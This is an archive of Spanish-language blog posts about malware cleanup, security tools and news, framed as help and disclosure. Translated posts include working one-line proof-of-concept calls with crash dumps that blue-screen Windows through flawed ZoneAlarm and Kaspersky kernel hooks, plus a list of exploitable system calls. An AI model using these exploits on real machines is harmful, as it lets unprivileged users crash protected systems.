Entradas etiquetadas con “Malware” de Mixelandia

<Actualización>
He actualizado el fix para que termine la mayor cantidad de nombre posibles, pero no es seguroa, por lo tanto primero intenta con el fix, en caso de que no funcione entonces sigue leyendo y haz lo que dice la otra actualización.
Saludos
</Actualización>

Iniciare por poner el resultado que obtuve ayer en virustotal.com del archivo:

Pues resulta que pablo, un compa de Argentina me envio un link de un virus, que al checar en virus total me dio 0 de 30 es decir que no lo reconocia ningun antivirus.


 

Recientemente me tope con una página de un periodico la cual dice lo siguiente:
"El bicho utiliza este sistema de mensajería para mudarse de contacto en contacto. El archivo adjunto se llama "IMG-0012.zip". Suele mandar a los usuarios a una presunta página de imágenes.
El virus rápidamente infecta la máquina e intenta avanzar sobre los contactos del afectado. Además, según el sitio chiletech.cl, el gusano roba contraseñas, por lo que podría ser especialmente peligroso para aquellos que hacen negocios por la web o para quienes operan con banca electrónica. Desde ayer, comenzó a circular un email en el que se advierte a los usuarios sobre el virus. Además, algunos sitios web, como la página mixelandia.com, aconsejan descargar el antivirus Rootkit para erradicar este peligroso bicho."

Normalamte que alguien ponga un link a tu sitio (en este caso el blog) es bueno, sin embargo en este texto hay un poco de problemas, o más bien uno muy grave: algunos sitios web, como la página mixelandia.com, aconsejan descargar el antivirus Rootkit para erradicar este peligroso bicho.  Uta madre cabron no me chingus, como que mixelandia te recomienda bajar el antivirus Rootkit. Aver empecemos por decir una cosa, en ningun lado dije que se usara un antivirus llamado rootkit, esmás no creo que exista tal cosa, lo que yo escribi fue que utilizaran el Rootkit Unhooker, el cual no es un antivirus, sino una herramienta Anti Rootkits.

Me cae que con esas cosas la gente terminara diciendo que en mixelandia te recomendamos instalar un tipo de malware para quitar otro.

Saludos y no se dejen engañar por todo lo que puedan leer

Después de algunos cuantos meses que dejé dormido este proyecto, hace unos cuantos días me dí a la tarea de volver a sumergirme en las fuentes del SB Cleaner, optimizar algoritmos, y sobre todo utilizar las librerias que los amigos del projecto de Rootkit  Unhooker pusieron a la disposición de todo mundo.

Cambios de la versión:

Se reviso y mejoro el algoritmo de limpieza, basada en autorun.inf
Se corrigio un posible fallo cuando el archivo autorun.inf estaba vacío o mal formado.
Optimización general del código fuente.
Reducción del tamaño del ejecutable de 62KB a solo 34 35.5KB.
Se reescribio por completo el algoritmo para obtener las unidades.
Ya no se listan los CD's y los DVD's, es inútil.
Soporte para rutas UNC. (de ahí el \\?\)
Mejoré el proceso de limpieza automática.
**Ya regreso el algoritmo contra el brontok, corregido y mejorado

*** Actualización

Deprecated_
/*por razones que desconosco, el algoritmo de revisión del brontok, generaba un error de corrupción de memoria, por lo que por esta versión no estara disponible. Espero encontrar la falla y publicar un update.*/

Después de que mi entrada parece que no fuera muy clara y que algunas personas tubierón algunos problemas con lo de la ejecución de archivos, les dejo este video donde se ve paso a paso como eliminar a lechuck en forma manual y usando el fix, también como recuperar la asociación de archivos exe, bat, pif y com.


Saludos

El jueves pasado (27 de septiembre) corina me trajo una laptop que estaba infectada, chucky, segun ella, ese virus no se dejaba y no se que tana cosa...

bueno dijo que el virus se burlo de ella, cosa que no resulta rara pero bueno, a final de cuentas LeChuck.a, no fue pieza, y aunque termina algunos antivirus, y algunas otras herramientas, no lo hace por arte de magia, simplemete es un truquillo o dos, los cuales dare a continuación.

Primero lo primero, LeChuck esta codificado en VB 6, esta empaquetado con Petite 2.0, lo cual hasta cierto punto es tonto, ya que Petite 2.0 puede ser deshecho hasta con procdump, pero bueno sigamos,  contiene una Dll, la cual es winzip, empaquetada con UPX, sin modificar, lo cual me permitio ver que esa dll es inofensiva.

Continuando con esta seir de entradas, le toca el turno a la herramienta Auntouns, que nos permite ver que archivos son ejectuados al iniciarse nuestra computadora. La importancia de esto reside en que los virus, deben de encontrar una manera de sobrevivir a todas y cada una de las apagadas que le das a tu computadora, es decir que de alguna forma deben de volverse a ejecutar cada vez que la enciendes. Para esto hay muchos métodos, y la mayoria, tienen que ver con el registro de windows. Y esto es debido a que el registro es una parte primordial del sistema operativo, es el lugar en el que se guardan la mayoria de las opciones del sistema, opciones de los usuarios y muchas otras cosas más. Sin embargo este no es un lugar seguro para jugar, ya que algun cambio en el registro, que no sea correcto podria dejar tu máquina, y gastar más en la reparación que en el mentado virus.

Si bien es cierto Windows ya biene con un programa que nos permite modificar el registo, llamado regedit.exe, este no es lo más intuitivo ni agradable ala vista para un usuario no muy avanzado. Con esto en mente, un programador llamado Mark Russinovich creo un programa llamado Autoruns, el cual nos permite ver que programas se incian con el sistma, así como otras tantas opciones, de una manera fácil y sobre todo segura. Esto, suena bien para la mayoria de nosotros, sin embargo de que sirve autoruns, cuando no sabemos lo que estamos viendo. Asi esta entrada explica como es que yo recomiendo utilizar autoruns, que de hecho es la manera que lo uso. Bueno iniciemos ya para no distraerlos más.

Lo primero es descargarlo desde aquí

Iniciando con esta saga de entradas, que explican como utilizar las diversas herramientas que utilizamos en mixelandia, los dejo con Process Explorer

Como siempre empezaremos por descargarlo desde aquí.

Una vez que lo hemos descargaso se nos presenta una carpeta con tres archivos, de los cuales el que nos interesa es procexp.exe, que es el ejecutable del programa.

bien empecemos por describir que es Process Explorer.

Después de varios acontecimientos que se ha sucitado en estos ultimos dias, me puse a desempolvar los foros que ya tenia instalados, pero que me faltaba configurar. En estos foros habiamos planeado subir algunas cosillas, pero bueno no todo se puede hacer, ni las cosas se dan como uno las planea.
Pero bueno en fin lo más importante es que ya estan de nuevo los foros funcionando, con pocas secciones, de hecho las necesarias para el objetivo que tengo en mente en este momento, que es brindar ayuda a los usuarios con sus probolemas de virus.

También esto obedece a que por ejemplo con el virus del messenger, tube que repetir muchas veces paso a paso de manera personalizada a varias personas que me pidieron que las agregara. Por eso me he decidido a hacer algunas cuantas entradas que iran mostrando paso a paso como realizar de manera general las acciones más comunes para la limpieza de virus o malware.


Todabia falta muchisimo trabajo en lo que a los foros se requiere, pero poco a poco, como el tiempo me lo vaya permitiendo, iremos modificandolos para que queden bien nice ;)


Saludos

Pues resulta que deje instalado el programa (img24.zip) del virus en mi maquina virtual, y hoy que la reviso me topo con la sorpresa de que estoy enviendo spam.. pro que lo digo, bueno basta ver las direcciones a las que se esta conectando el archivo temporal que descargo el virusito este que tanto hemod hablado. Desafortunadamente para cuando me dispuse ha hacer esta entrada, el envio masivo de emails desde mi maquina ya habia finalizado, sin embargo el tiempo que duro me permitio recolectar alguna infomación importate.

Lo primero es que el virus se conecta a un servidor, desde el cual recive ordenes, el cual es este 147.202.32.83:2756 obiamente no se trata de ninguna página web normal, ya que estas suelen estar en el puerto 80 o 8080, ahora veamos que  nos regresa esa dirección.

:link6.bitch.net 451 GET :
:link6.bitch.net 451 Host: :
:link6.bitch.net 451 User-Agent: :
:link6.bitch.net 451 Accept: :
:link6.bitch.net 451 Accept-Language: :
:link6.bitch.net 451 Accept-Encoding: :
:link6.bitch.net 451 Accept-Charset: :
:link6.bitch.net 451 Keep-Alive: :
:link6.bitch.net 451 Connection: :

Hoy despues de dos días vuelvo a hacer una entrada, y esque estos tiempos han sido de bastante agetreo para mi, debido al virusito este que pego por el messenger y a la caida que tuvo UBH.

Ya en algunas ocaciones he hablado de la importancia que tiene el navegar con seguridad, y el no estar desprotegidos mientras nuestra computadora esta conectada a internet. Y esque hace unos días atras nuesto hosting estubo bajo un fuerte ataque de DDoS, el cual estubo haciendo que la Union de Bloggers Hispanos, tubiera caidas, asi como algunos otros sitios que estan hospedados en ese lugar.

Hace unos momentos estaba yo muy tranquilo chateando con un amigo, y de repente me aparece una conversación de una amiga la cual me manda el siguiente mensaje:

    Moquita Bonita     dice:
oye voy a agregar esa foto a mi blog ya
    Moquita Bonita     envía:

    IMG-0012.zip
 
    Abrir (Alt+P)
     Mixel Adm:          Nomas no digas que no     Ya casi 25... fiestaaaaaaaa eaaaa      party://29.9.7.9:25 dice:
¿¿??¿?
 
  Has recibido satisfactoriamente C:\Documents and Settings\Administrador\Mis documentos\Mis archivos recibidos\IMG-0012.zip de     Moquita Bonita    .
 
     Mixel Adm:          Nomas no digas que no     Ya casi 25... fiestaaaaaaaa eaaaa      party://29.9.7.9:25 dice:
y eso que es ???
ha ya se virus

Hoy recibí un correo de parte de Microsoft, el cual dice lo siguiente:

Este texto fue publicado por EP_X00F en los foros de sysinternals.

aqui

-- comienza traducción --

Hola

El troyano Rustock, acutalmente es uno de los malwares más avanzados tecnicamente. La uni ca parte que conforma esta troyano, se encuentra implementada en el modo kernel, así como su sistema de antidetección y su sistema de red.

Esta es una lista de las versiones disponibles de Rustocy y algunas de sus variantes (posiblemente no todas).


La mayoria de ellas fueron encontradas con la ayuda de herramientas HIDS gratuitas o con la ayuda de HIPS.


i386.sys
sysbus32.sys (2006)
wincom32.sys (2006?)

SSDT patching y IRP hooking

??windev.sys (2006?)

No hay información

pe386.sys (2006)


Hooking de la SYSCALL / ocultacion del driver.

mni41.sys (2006)*

*El driver puede tener un nombre aleatorio.

SSDT inline hooking, IRP hooking
Empaquetado con un protector polimórfico similar al de las versiones posteriores
Motor TCP/IP stack (firewalls sobrepasadas)
Eliminación de los competidores (ntio256.sys y runtime2.sys)

Como puede observarse, esta versión fue detectada apenas unos cuantos meses atras.


huy32.sys (2006)

Beta de Rustock.B
Contiene casi toda la funcionalidad de la versión principal

lzx32.sys (2006)

Actualmente es el rootkit de modo kernel mas avanzado que se a detectado
SYSCALL inline hooking
Utiliza ADS para ocultarse (diferentes variantes utilizan diferentes maneras para hacer esto)
motor TCP/IP stack  (firewalls sobrepasadas)
Sistema avanzado de antidetección (Contiene una lista negra de antirootkits - RKR, IceSword, DarkSpy, Blacklight, GMER)
Tanto el Dropper y el driver estan empaquetados con un protector avanzado.


Rustock.C (2006)
??Rustock.D (2007?)

Implementación en la parte profunda del kernel
Firewall y antivirus completamente sobrepasados
Autodefensa (DKOM y parcialmente DKOH)
Sistema Anti antirrotkits (los antirootkitys mas populares son sobrepasados)
Sistema Anti VM (las maquinas virtuales "VM" son detectadas y se evita la ejecución en estas)
Técnicas anti debugging
Empaquetador Polimórfico para drivers y droppers (unico, empaquetador + protector para drivers privado)

Para nosotros carece de todo sentido el proposito ("aspetos éticos" y otras mierdas ) con el que se haya desarrollado esta serie de troyanos y lo que este haciendo en la actualidad. Nosotros estamos interesados solamente en la propia tecnología de los rootkits, debido a que esta puede mejorar las habilidades de todos los antirootkits dessarrollados en estos momentos (RkU, gmer, IceSword).

Así que si alguine puede agragar algo más acerca de Rustock o alguno acerca de sus multiples variantes, estaremos muy felices de ello.

-- Termina traducción --

Saludos

Expertos en seguridad han dejado al descubierto una vulnerabilidad 0-day en la ultima versión de Firefox, la cual provee control total sobre computadoras con el sistema operativo Windows, cuando se visita un sitio "booby-trapped" con el navegador de Mozilla.

La vulnerabilidad consiste en la forma en que Firefox maneja los identificadores uniformes de recursos o URI (uniform resource identifiers) , que es el protocolo que permite al navegador accesar a diferentes programas y otros recursos localizados en la PC. El fallo se produce cuando el navegador es incapaz de procesar correctamente al menos 5 URI diferentes.

durante los últimos meses las URI's han surgido como uno de los eslabones mas débiles en la cadena de seguridad. La semana pasada Mozilla libero un parche critico para Firefox, relacionado con el manejo de URI's. Por otro lado Internet Explorer y Trillian Instant Messenger también fueron victimas de este fallo.

el problema es resultado de la poca documentación que existe de los incontables URI's que son agregados por aplicaciones de terceros al registro de Windows. Los navegadores normalmente no están bien preparados para confrontar de una forma correcta los diferentes exploits de seguridad que surgen de estos URI's, aun y cuando estos son de aplicaciones relacionadas entre si.

Hay que tomar en cuenta que con cada URI que se registra, la posibilidad de que se lleve a cabo un ataque exitoso contra la máquina,esta umenta.

"Esta es una especie de super tormenta en la ue los navegadores no están haciendo correctamente su trabajo, en términos de limpiar las URI's y las aplicaciones que registran esas URI's no son capaces de manejar correctamente los parámetros que están siendo pasados a este por el navegador"

Un vocero de la organización open-source comento que el equipo de seguridad de Mozilla esta es al tanto de este hecho y ya se encuentran generando el parche correspondiente.

Si alguna vez tienen algún problema de Spyware, adware o cualquiera de las modalidades del malware, no duden en llamar a un exorcista, o ya de perdida a su consultor local en tecnologías de la información, eso es lo que nos deja ver este anuncio gringo de publicidad.



Tambien adware y virus

Los pequeños demonios dentro de su computadora

conocidos por crear pop-ups
cambiar la configuración, robar su informacion personal
y hasta destruir su computadora.

XXXXX consuling
te tenemos protegido
"


que cosas no, yo ya estoy preparando mis balas de plata y mis crucifijos, pa' luchar contra el malware.

saludos

En estos días se ha desatado un ataque de ingeniería social utilizando para esto un correo elctronico que se supone es enviado por Microsoft en el que te dice que hay una actualizacion para el windows, el cual te lleva a una página desde la que se te indica que bajes un cierto parche el cual pro supuesto es malware.

Se dice que el correo luce muy real y que incluye los logos de microsoft, para lo cual no se requiere mucho, puesto que todos sabemos la calidad de los productos de microsoft, eso si es fácil de imitar.

La ironía en esto es que ahora se esta usando un parche para una vulnerabilidad par engañar a los usuarios, lo cual si es algo no muy usado.

Saludos

Después de algunos días no haber podido dedicarle tiempo al este programita, este fin de semana me puse a finalizar lo que a mi punto de vista es la versión 1.7.

El cambio aqu mas me tardo es el hecho de que ya no uso los forms de delphi, lo que hizo que el tamaño del programa se redujera en mucho, pasando a solo unos cuantos kilos (63kilobytes), reduciendo también con esto el uso de memoria RAM y más recurso del sistema.

Otra cosa que le agregue fue que ahora mientras el programa se este ejecutando, al momento de conectar una memoria esta es analizada (y limpiada en caso de ser necesario) en forma automática.

Tambien le puse que al momento de minimizar la ventana se agrega a la barra de iconos de notificación.

Hice alunas limpiezas y mejoras en el código fuente, por lo cual también se redujo el tamaño del ejecutable.


Lo que bien es introducir una hoja de opciones, hacer que el programa se instale como servicio (si que se inicie estomáticamente con windows pero con los privilegios mas elevados).

también un menú y mas cosillas pero eso sera con tiempo y un poco de deificación, por mientras aquí les dejo la versión mas reciente del USBCleaner

Descargar

Los hackers han desarrollado una nueva forma de engañar alos usuarios y que descarguen malware desde un sitio de descarga apocrifo de Adobe Shockwave Player.

la forma en que operan estos sitios es mostrando iconos especialmente formados, para hacer creer al usuario que su copia de Shockwave (si es que se encuentra instalado) no esta funcionando correctamente.

Todos los links apuntan a otro sitio el cual da un "diagnostico del problema", hay que actualizar el macromedia flash player. El usuario es redirigido a un sitio que se hacer pasar por el Centro de descarga del hockwave Player.

Por supuesto la descarga es un troyano, en vez del popular Flash player. Entre las características del sitio podemos encontrar que deshabilita el botón derecho del mouse.

Con la utilización de ingeniería social, en vez de utilizar permanentemente vulnerabilidades, tales como el iFrame en internet explorer, los hackers extienden los rangos de sus posibles víctimas.

El otro dia posteamos un exploit para KAV y ahora le toco el turno a Zone Alarm, un firewall muy usado por su servidor.
El post original esta en ingles aquí

ZoneAlarm Pro version:7.0.337.000
Driver version:7.0.337.000

Actualmente estamos trabajando con varios antivirus / firewalls y estamos probando la estabilidad de algunos de ellos . Lo cual muestra una muy mala situación. ;)

Todos adoran usar ganchos =), desafortunadamete el nivel de conocimiento de sus desarrolladores de drivers para el kernel deja mucho que desear. Simplemente no saben como manejar los ganchos en la SSDT.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreatePort pobre manejo del gancho, service id 46

NtCreatePort esta ganchada por las fucniones del driver vsdatant.sys.

Prototipo de la Función


NTSYSAPI
NTSTATUS
NTAPI
NtCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);


Aquí estan un pequeño exploit que conduce a un pantallazo azul.
Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.


NtCreatePort(nil, pointer($81234567), 0, 0, 0);


Y aquí esta el analisis de este BSOD

Originally posted by windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd256, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 4

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd256

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
fc65bd48 804df06b 00000000 81234567 00000000 vsdatant+0x33256
fc65bd64 7c90eb94 badb0d00 0012fe10 00000000 nt+0x806b
fc65bd68 badb0d00 0012fe10 00000000 00000000 0x7c90eb94
fc65bd6c 0012fe10 00000000 00000000 00000000 0xbadb0d00
fc65bd70 00000000 00000000 00000000 00000000 0x12fe10


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33256

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Otro exploit con la misma técnica para el mismo firewall.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreateWaitablePort, service id 56

NtCreateWaitablePort es otra función ganchada por el driver.

Function prototype

NTSYSAPI
NTSTATUS
NTAPI
NtCreateWaitablePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);



Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.

NtCreateWaitablePort(nil, pointer($81234567), 0, 0, 0);


Esto lleva inmediatamente a un BSOD


analisis en windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd336, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 5

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd336

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f89ded48 804df06b 00000000 81234567 00000000 vsdatant+0x33336
f89ded64 7c90eb94 badb0d00 0012fe10 f90f5d98 nt+0x806b
f89ded68 badb0d00 0012fe10 f90f5d98 f90f5dcc 0x7c90eb94
f89ded6c 0012fe10 f90f5d98 f90f5dcc 00000000 0xbadb0d00
f89ded70 f90f5d98 f90f5dcc 00000000 00000000 0x12fe10
f89ded74 f90f5dcc 00000000 00000000 00000000 0xf90f5d98
f89ded78 00000000 00000000 00000000 00000000 0xf90f5dcc


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33336

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Estamo seguros que existen otros ganchos codificados de una manera deficiente, mas ya no seguimos probando otros.


Saludos
EP_X0FF/UG North

Programas antivirus de varias compañías de nivel mundial han fallado en la mayor prueba de malware la VB100

Los productos de Kaspersky, Grisoft, y F-Secure han fallado en detectar el 100% del malware que se encuentran en la base de datos de Virus Bulletin, anqué en alguna ocasión ya habían pasado esta prueba.

De los 37 productos probados, 10 fallaron al momento de demostrar sus habilidades de detección necesitarías para obtener la certificación VB100.

Kaspersky Anti-Virus 6.0.2.621 fallo en detectar el gusano de internet llamado allaple. De acuerdo con el consultor de tecnología de Kaspersky, David Emm, Kaspersky había agregado la firma para el gusano en Febrero. Sin embargo al momento de la prueba, Kaspersky se encontraba "optimizando" la firma del allape, y la firma no se encontraba en la base de datos de Kaspersky.

Grisoft AVG 7.5 professional Edition también fallo en el VB100. AVG es una aplicación antimalware gratuita muy conocida, que tiene una gran aceptación.

Larry Bridwellm el estratega general de seguridad de Grisoft, dijo que la parte de este anti-malware, AVG 7.5 Professional Edition, que detecta firmas ha fallado al detectar una de las variantes del Troyano Agobot, pero que la parte anti-spyware del producto lo había detectado. "Las pruebas son al momento de accesar los archivos a nivel hardware" comento Bridwell. Cuando se probo el AVG 7.5 Professional Edition, encontramso el bot en la parte del anty spyware, la cual es sobre demanda [el programa tiene que iniciarse de forma manual]. Deberíamos de haber detectado el malware al momento del acceso.

Al igual que Kaspersky el servicio de protección para clientes de F-Secure (7.00 buil 387) fallo al detectar el Allaple. La compañía dijo que había cometido un error al no enviar las últimas actualizaciones de su base de datos. "El producto enviado a la prueba no incluía las ultimas actualizaciones", comentó F-Secure. "El programa que probado off line, lo cual no permitió al programa actualizarse a la ultima versión en la base de datos. En el ambiente del usuario normal la base de datos se hubiera actualizado de manera automática.

Todas estas pruebas fueron realizadas en Windows XP.

Esta es una traducción de una entrada que hizo el buen EP_X0FF en los foros de sysinternals
y que pueden leer en ingles aquí

El bien conocido antivirus Kaspersky, desde hace un buen tiempo sufre de un bug muy peligroso, el cual permite tronar el sistema protegido por este antivirus, aun desde la cuenta de invitado.

Todos los intentos de avisar a Kaspersky Lab sobre esta vulnerabilidad han sido ignorados. Este material fue mostrado varios años atras, y en el ultimo verano publicamos un nuevo exploit para Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem. Y despues de este tiempo nada ha cambiado. Aun ahora con la nueva version Kaspersky AV 7.0 este exploit sigue funcionando muy bien.
El objetivo principal de este exploit es hacer una llamda a NtOpenProcess con parametros invalidios. Esta funcion esta intervenida (hooked) por el diver de Kaspersky llamdo klif.sys y la reazon para este intercepción es obia - Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso, esto es muy usado por el malware.

Aqui el prototipo de esta función

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL );


Aquí un pequeño exploit codificado en pascal(funciona para el klif.sys vesion 6.12.10.280 y versiones previas)


var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;

Como podran ver el ultimo parametro es la dirección de la estructura CLIENT_ID, la cual apunta hacia una región aleatoria dentro de la memoria del kernel.
al probar el xploit en una instalación limpia de windows XP , sin KAV -no hay BSOD(Blue Screen Of Death o Pantallazo azul).

Al ejecutarlo en un Windows XP protegido por KAV 7.0 -inmediatamente tenemos un BSOD - PAGE_FAULT_IN_NONPAGED_AREA.

Pero ¿Porque pasa esto? la respuesta es muy sencilla. Supongo que el codigo fuente de el hook en NtOpenProcess es algo como esto:

NTSTATUS NewNtOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
__try
{

if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED;

else return RealNtOpenProcess(ProcessHandle, DesiredAccess,
ObjectAttributes, ClientId);
__except (EXCEPTION_EXECUTE_HANDLER)
{
... stuff here ...
}
}

El gran problema aquí es ClientId->UniqueProcess, ya que ClientId es un PUNTERO a una estructura. El hecho de accesar a una región invalida de memoria produce inmediatamente un PAGE_FAULT_IN_NONPAGED_AREA.


el exploit original fue creado por Ms-Rem y luce así


NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);

Comopodras observar los desarrolladores de KAV han usado un bloque try/except, y parece ser que no saben usar otro tipo de funciones manejadoras de erores.

Esperemos que los desarrolladores de Kaspersky Antivirus descubran el fabuloso programa llamado NtCall y corrigan su bug.


*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

***** Kernel symbols are WRONG. Please fix symbols to do analysis.


MODULE_NAME: klif

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000

FAULTING_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 1

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from f941b39a to f941840c

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4


STACK_COMMAND: kb

FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

SYMBOL_STACK_INDEX: 0

FOLLOWUP_NAME: MachineOwner

IMAGE_NAME: klif.sys

SYMBOL_NAME: klif+1940c

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner

Algunos descubrimientos hechos por UG North muestran que hay otras funciones que tambien estan intervenidas por klif.sis las cuales pueden ser explotadas con ataques similares.

Lista de entradas en la SSDT explotables (Windows XP / KAV 7.0.0.55)

==================================
|[Idx] [nombre de la función] |
==================================
|[41 ] NtCreateKey
|[47 ] NtCreateProcess
|[48 ] NtCreateProcessEx
|[50 ] NtCreateSection
|[52 ] NtCreateSymbolicLinkObject
|[53 ] NtCreateThread
|[65 ] NtDeleteValueKey
|[99 ] NtLoadKey2
|[119] NtOpenKey
|[122] NtOpenProcess
|[125] NtOpenSection
|[177] NtQueryValueKey
==================================
Cualquier llamada a esas funciones con parametros invalidos, llevara a un BSOD.

Este tipo de exploit fue descubierto por Ms-Rem en el 2005 y funciona para KAV 5.0

Como se mostro este exploit funciona para todas la versiones de Kaspersky Antivirus incluyendo la nueva versión 7.0.

¿Realmente aun crees quie estas portegido?

Hace unos días llego al negocio un cliente diciendo que su maquina no quería arrancar,que al momento de llegar al login, la computadora se reseteaba sin mas ni menos, por lo cual procedí a investigar el caso. Los síntomas que presentaban eran del clásico fallo de un driver, en pocas palabras el horrendo Pantallazo azul, el cual decía que amon.sys había provocado un fallo grave...
A estas alturas ya tenia el nombre del culpable,y la solución, desinstalar NOD32, hay que recordar que el archivo amon.sys corresponde al driver que instala NOD 32 encargado de la monitorización del sistema.
Inicie la maquina, configure el sistema operativo para entrar en modo a prueba de fallos y desinstale el NOD 32. Acto seguido resetie la computadora y listo esta entro sin ningún problema.
Después de reiniciar, reinstale el NOD32 y comencé a actualizarlo, esto tardo algún tiempo, ya que fueron un poco más de 6MB y di inicio a el scaner del sistema.....
Bien yo no sabia si llorar o correr o de plano ponerme a gritar con lo que el escaneo arrojó... esa maquina tenia una cantidad de virus, que siendo sincero nunca había visto en un sistema con antivirus (y creanme que he visto cosas que son difíciles de creer a nivel computación).

Una vez que termine de limpiar la máquina y reiniciar, suponía que la pesadilla había terminado o por lo menos eso deseaba yo.....

